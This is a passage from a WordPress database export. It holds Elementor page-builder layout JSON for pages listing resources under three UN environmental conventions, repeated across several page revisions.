ion\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(6206,566,'_wp_page_template','default'),(6207,566,'_elementor_edit_mode','builder'),(6208,566,'_elementor_template_type','wp-page'),(6209,566,'_elementor_version','2.7.5'),(6210,566,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(6212,567,'_wp_page_template','default'),(6213,567,'_elementor_edit_mode','builder'),(6214,567,'_elementor_template_type','wp-page'),(6215,567,'_elementor_version','2.7.5'),(6216,567,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat 